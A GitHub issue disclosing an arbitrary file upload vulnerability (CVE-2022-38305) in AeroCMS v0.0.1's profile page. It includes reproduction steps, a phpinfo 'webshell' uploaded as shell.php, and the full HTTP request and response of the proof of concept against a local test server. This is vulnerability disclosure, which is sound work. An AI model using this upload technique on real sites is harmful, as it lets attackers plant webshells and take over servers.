Headline
CVE-2022-38305: An arbitrary file upload vulnerability was found · Issue #3 · MegaTKC/AeroCMS
AeroCMS v0.0.1 was discovered to contain an arbitrary file upload vulnerability via the component /admin/profile.php. This vulnerability allows attackers to execute arbitrary code via a crafted PHP file.
Hello I want to report an arbitrary file upload vulnerability that I found in AeroCms v0.0.1, through which we can upload webshell and control the web server.
Step to Reproduct
After entering the background of website management, click “Profile” to enter the interface of "/admin/profile. PHP", and you can see that the function of uploading pictures exists.
We create a new webshell file and name it shell.php :
<?php phpinfo(); ?>
Next, we select the file and click “Updae Profile” to upload the file
When upload success access ‘/images/shell.php’
We can see that the file was successfully uploaded and executed
Vulnerable Code
No file checking before uploading
POC
Injection Point
-----------------------------423983190532431556521178267050
Content-Disposition: form-data; name="user_image"; filename="shell.php"
Content-Type: image/jpeg
Request
POST /admin/profile.php HTTP/1.1
Host: 127.0.0.1:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:103.0) Gecko/20100101 Firefox/103.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------423983190532431556521178267050
Content-Length: 1109
Origin: http://127.0.0.1:8080
Connection: close
Referer: http://127.0.0.1:8080/admin/profile.php
Cookie: PHPSESSID=dh3hq98sqsj0eapgn43efegfb3
Upgrade-Insecure-Requests: 1-----------------------------423983190532431556521178267050
Content-Disposition: form-data; name="username"1111
-----------------------------423983190532431556521178267050
Content-Disposition: form-data; name="password"123.com
-----------------------------423983190532431556521178267050
Content-Disposition: form-data; name="user_firstname"-----------------------------423983190532431556521178267050
Content-Disposition: form-data; name="user_lastname"-----------------------------423983190532431556521178267050
Content-Disposition: form-data; name="user_email"-----------------------------423983190532431556521178267050
Content-Disposition: form-data; name="user_image"; filename="shell.php"
Content-Type: image/jpegtest is test
<?php phpinfo();?>
-----------------------------423983190532431556521178267050
Content-Disposition: form-data; name="user_role"Subscriber
-----------------------------423983190532431556521178267050
Content-Disposition: form-data; name="update_user"Update Profile
-----------------------------423983190532431556521178267050–
response
HTTP/1.1 200 OK
Date: Wed, 10 Aug 2022 02:45:01 GMT
Server: Apache/2.4.10 (Debian)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 8474
Connection: close
Content-Type: text/html; charset=UTF-8<meta charset="utf-8"> <meta http-equiv="X-UA-Compatible" content="IE=edge"> <meta name="viewport" content="width=device-width, initial-scale=1"> <meta name="description" content=""> <meta name="author" content=""> <title>AeroCMS Admin Panel</title> <!-- Bootstrap Core CSS --> <link href="css/bootstrap.min.css" rel="stylesheet"> <!-- Custom CSS --> <link href="css/sb-admin.css" rel="stylesheet"> <!-- Custom Fonts --> <link href="font-awesome/css/font-awesome.min.css" rel="stylesheet" type="text/css"> <!-- HTML5 Shim and Respond.js IE8 support of HTML5 elements and media queries --> <!-- WARNING: Respond.js doesn't work if you view the page via file:// --> <!--[if lt IE 9]> <script src="https://oss.maxcdn.com/libs/html5shiv/3.7.0/html5shiv.js"></script> <script src="https://oss.maxcdn.com/libs/respond.js/1.4.2/respond.min.js"></script> <![endif]--> <link rel="stylesheet" href="css/styles.css"> <script type="text/javascript" src="https://www.gstatic.com/charts/loader.js"></script> <script src="https://cloud.tinymce.com/stable/tinymce.min.js"></script> <script src="js/jquery.js"></script> <div id="wrapper"> <!-- Navigation --> <nav class="navbar navbar-inverse navbar-fixed-top" role="navigation"> <!-- Brand and toggle get grouped for better mobile display --> <div class="navbar-header"> <button type="button" class="navbar-toggle" data-toggle="collapse" data-target=".navbar-ex1-collapse"> <span class="sr-only">Toggle navigation</span> <span class="icon-bar"></span> <span class="icon-bar"></span> <span class="icon-bar"></span> </button> <a class="navbar-brand" href="index.php">AeroCMS</a> </div> <!-- Top Menu Items --> <ul class="nav navbar-right top-nav"> <!-- <li><a href='#'>Users Online: </a></li> --> <li><a href='#'>Users Online: <span class="usersonline"></span></a></li> <li><a href="../index.php">View Site</a></li> <li class="dropdown"> <a href="#" class="dropdown-toggle" data-toggle="dropdown"><i class="fa fa-user"></i> <b class="caret"></b></a> <ul class="dropdown-menu"> <li> <a href="#"><i class="fa fa-fw fa-user"></i> Profile</a> </li> <li class="divider"></li> <li> <a href="../includes/logout.php"><i class="fa fa-fw fa-power-off"></i> Log Out</a> </li> </ul> </li> </ul> <!-- Sidebar Menu Items - These collapse to the responsive navigation menu on small screens --> <div class="collapse navbar-collapse navbar-ex1-collapse"> <ul class="nav navbar-nav side-nav"> <li> <a href="index.php"><i class="fa fa-fw fa-dashboard"></i> Dashboard</a> </li> <li> <a href="javascript:;" data-toggle="collapse" data-target="#posts_dropdown"><i class="fa fa-fw fa-arrows-v"></i> Posts <i class="fa fa-fw fa-caret-down"></i></a> <ul id="posts_dropdown" class="collapse"> <li> <a href="./posts.php">View All Posts</a> </li> <li> <a href="./posts.php?source=add_post">Add Posts</a> </li> </ul> </li> <li> <a href="./categories.php"><i class="fa fa-fw fa-wrench"></i> Categories</a> </li> <li> <a href="./comments.php"><i class="fa fa-fw fa-file"></i> Comments</a> </li> <li> <a href="javascript:;" data-toggle="collapse" data-target="#users"><i class="fa fa-fw fa-arrows-v"></i> Users <i class="fa fa-fw fa-caret-down"></i></a> <ul id="users" class="collapse"> <li> <a href="./users.php">View All Users</a> </li> <li> <a href="./users.php?source=add_user">Add User</a> </li> </ul> </li> <li> <a href="./profile.php"><i class="fa fa-fw fa-file"></i> Profile</a> </li> </ul> </div> <!-- /.navbar-collapse --> </nav> <div id="page-wrapper"> <div class="container-fluid"> <!-- Page Heading --> <div class="row"> <div class="col-lg-12"> <h1 class="page-header"> Welcome to the Admin Panel, <small>!</small> </h1> <form action="" method="post" enctype="multipart/form-data"> <div class="form-group"> <label for="username">Username</label> <input type="text" name="username" value="1111" class="form-control"> </div> <div class="form-group"> <label for="password">Password</label> <input type="password" name="password" value="123.com" class="form-control"> </div> <div class="form-group"> <label for="user_firstname">Firstname</label> <input type="text" name="user_firstname" value="" class="form-control"> </div> <div class="form-group"> <label for="user_lastname">Lastname</label> <input type="text" name="user_lastname" value="" class="form-control"> </div> <div class="form-group"> <label for="user_email">Email</label> <input type="email" name="user_email" value="" class="form-control"> </div> <div class="form-group"> <label for="user_image">Image</label> <img class="img-responsive" width="200" src="../images/test2.php" alt=""> <input type="file" name="user_image" class="form-control"> </div> <div class="form-group"> <select name="user_role" class="form-control"> <option value="Subscriber">Subscriber</option> <option value='Admin'>Admin</option> </select> </div> <div class="form-group"> <input type="submit" value="Update Profile" name="update_user" class="btn btn-primary"> </div> </form> </div> </div> <!-- /.row --> </div> <!-- /.container-fluid --> </div> <!-- /#page-wrapper --> </div> <!-- /#wrapper -->
<script src="js/scripts.js"></script>
I hope you can fix this vulnerability as soon as possible. I will report this vulnerability to CVE. Looking forward to your reply